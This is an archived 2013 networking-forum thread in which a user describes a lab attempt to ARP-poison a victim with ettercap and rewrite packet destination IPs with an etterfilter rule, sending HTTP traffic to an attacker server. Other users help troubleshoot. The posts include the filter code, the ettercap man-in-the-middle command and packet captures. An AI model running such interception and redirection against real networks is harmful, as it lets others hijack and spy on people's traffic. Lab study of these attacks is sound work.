ettercap - intercepting packets and changing destination IP

What's the best way to setup a home network? Why should I care about BGP?

ettercap - intercepting packets and changing destination IP

Post by nwn00bie on Thu Aug 22, 2013 3:21 am
([msg=76951]see ettercap - intercepting packets and changing destination IP[/msg])

Hello,

Just wondering if this concept is possible or even makes sense.

Basically, using ettercap to ARP spoof and capture packets, then modify the ip.dst field to redirect the packet elsewhere.

i.e. my filter would look like this:

Code: Select all
if (ip.proto == TCP && ip.src == '192.168.1.2' && ip.dst == '192.168.2.2' && tcp.dst == 80) {
    ip.dst = '192.168.1.3'
}


Reason for asking is that, I tried a simple test, and it doesn't seem to work. Not asking why it didn't work, but would like to check if this is even possible in the first place.

Thanks,
n3v3n
nwn00bie
New User
New User
 
Posts: 3
Joined: Thu Aug 22, 2013 3:14 am
Blog: View Blog (0)


Re: ettercap - intercepting packets and changing destination IP

Post by Goatboy on Thu Aug 22, 2013 6:51 am
([msg=76956]see Re: ettercap - intercepting packets and changing destination IP[/msg])

I haven't used ettercap in ages (in fact, I haven't used most things in ages) but if you could provide more details perhaps I could help. What test did you try? What was your network setup? What did you expect and what actually happened?

"Data data data, I cannot make bricks without clay."
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2823
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)


Re: ettercap - intercepting packets and changing destination IP

Post by limdis on Thu Aug 22, 2013 3:47 pm
([msg=76980]see Re: ettercap - intercepting packets and changing destination IP[/msg])

Right, need a bit more information on your attack setup. Have you successfully setup a MITM?
"The quieter you become, the more you are able to hear..."
"Drink all the booze, hack all the things."
User avatar
limdis
Moderator
Moderator
 
Posts: 1433
Joined: Mon Jun 28, 2010 5:45 pm
Blog: View Blog (0)


Re: ettercap - intercepting packets and changing destination IP

Post by nwn00bie on Thu Aug 22, 2013 10:05 pm
([msg=76986]see Re: ettercap - intercepting packets and changing destination IP[/msg])

Hi,

Thanks for the replies. My setup is as such:

Code: Select all
NETWORK: 192.168.2.0/24
GATEWAY: 192.168.2.1 (AA:AA:AA:AA:AA:AA)

VICTIM: 192.168.2.2 (BB:BB:BB:BB:BB:BB)

ATTACKER: 192.168.2.3 (CC:CC:CC:CC:CC:CC)

ATTACKER-SERVER: 192.168.2.4 (DD:DD:DD:DD:DD:DD)
ATTACKER-SERVER is running Apache server on port 80 (tested accessible from both VICTIM and ATTACKER)


Normal flow: VICTIM would access a web page from Internet at 123.123.123.123, i.e.
Code: Select all
VICTIM (192.168.2.2) -> GATEWAY (192.168.2.1) -> 123.123.123.123


Intended hijacked flow: ATTACKER would hijack the packet (using ARP poisoning) and redirect it to the ATTACKER-SERVER, i.e.
Code: Select all
VICTIM (192.168.2.2) -> ATTACKER (192.168.2.3) -> ATTACKER-SERVER (192.168.2.4)


filter.ecf:
Code: Select all
if (ip.proto == TCP && ip.src == '192.168.2.2' && ip.dst == '123.123.123.123' && tcp.dst == 80) {
    ip.dst = '192.168.2.4';
}


Ettercap Command:
Code: Select all
ettercap -M arp:remote,oneway -T -t TCP -F filter.ef /192.168.2.2/ /192.168.2.1/


Observations:

1. ARP poisoning successful.
a. I can see the ARP packets going around.
b. From the VICTIM's ARP cache, both 192.168.2.1 and 192.168.2.3 has MAC CC:CC:CC:CC:CC:CC

2. Packet sniffing successful. From the ATTACKER, I can see the SYN packet:
Code: Select all
Eth src: BB:BB:BB:BB:BB:BB
Eth dst: CC:CC:CC:CC:CC:CC
IP src: 192.168.2.2
IP dst: 123.123.123.123
TCP src: 11111
TCP dst: 80


3. Modification of destination IP seemingly successful. From the ATTACKER, I can see another SYN packet after the original one from VICTIM:
Code: Select all
Eth src: CC:CC:CC:CC:CC:CC
Eth dst: DD:DD:DD:DD:DD:DD
IP src: 192.168.2.2
IP dst: 192.168.2.4
TCP src: 11111
TCP dst: 80


4. Packet transmission seemingly successful (at least at IP layer). From the ATTACKER-SERVER, I can see the SYN packet modified and forwarded by ATTACKER:
Code: Select all
Eth src: CC:CC:CC:CC:CC:CC
Eth dst: DD:DD:DD:DD:DD:DD
IP src: 192.168.2.2
IP dst: 192.168.2.4
TCP src: 11111
TCP dst: 80


5. It stops here. I'm next expecting a SYN/ACK from the Apache server running on port 80 of ATTACKER-SERVER, but it never comes (not visible even from sniffing on ATTACKER-SERVER itself). Either that, or the forwarded packet just doesn't traverse up the network stack to the TCP layer.

Thanks,
n3v3n
nwn00bie
New User
New User
 
Posts: 3
Joined: Thu Aug 22, 2013 3:14 am
Blog: View Blog (0)


Re: ettercap - intercepting packets and changing destination IP

Post by Goatboy on Fri Aug 23, 2013 8:18 am
([msg=76989]see Re: ettercap - intercepting packets and changing destination IP[/msg])

You named your filter file "filter.ecf" but in your command you pass in "filter.ef"

Check to make sure you're matching file names. Might have been a typo on the forum when you wrote your post, but it doesn't hurt to make sure. This would make sense because ettercap is doing the ARP poison successfully, but it doesn't have a filter rule so it doesn't know to translate the address to 192.168.2.4 (ATTACKER-SERVER).

Also, this is basically the best post I've ever read in regards to asking for help. Seriously. You gave us the setup, expected result, actual result, and related comments. Awesome.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2823
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)


Re: ettercap - intercepting packets and changing destination IP

Post by nwn00bie on Tue Sep 03, 2013 9:13 pm
([msg=77237]see Re: ettercap - intercepting packets and changing destination IP[/msg])

Hi,

Sorry for the confusion and delayed response.

Goatboy wrote:You named your filter file "filter.ecf" but in your command you pass in "filter.ef"

Check to make sure you're matching file names. Might have been a typo on the forum when you wrote your post, but it doesn't hurt to make sure. This would make sense because ettercap is doing the ARP poison successfully, but it doesn't have a filter rule so it doesn't know to translate the address to 192.168.2.4 (ATTACKER-SERVER).


I missed out a step here, which is compiling the Ettercap filter file:

Code: Select all
etterfilter -o filter.ef filter.ecf


In other words, the code I posted is the "source code" for filter.ecf, which is compiled to filter.ef before I can use it with Ettercap.

In any case, I'm quite sure that the packet re-direction by the Ettercap filter was successful, as explained in point (4) of my lengthy post above. Just that, somehow the packet didn't traverse up the network stack to the TCP or application layer.

Just to roll things up a bit,

1. Looking around on the Internet, this doesn't seem to be the way everyone else normally does packet redirection. Nobody else seems to be redirecting packets just by changing the ip.dst field. Seems like the normal way to do redirect packets would be to use iptables in conjunction with Ettercap.

2. So it seems like this is the *wrong* way to do packet redirection with Ettercap. Then I'm curious, from a networking perspective, what's wrong with this approach? The packet that is retransmitted after changing the destination IP field is just as legitimate as any other, so how is it that the packet does reach the host that it is intended for, but does not make its way up to the application?

Thanks,
n3v3n
nwn00bie
New User
New User
 
Posts: 3
Joined: Thu Aug 22, 2013 3:14 am
Blog: View Blog (0)



Return to Networking

Who is online

Users browsing this forum: No registered users and 0 guests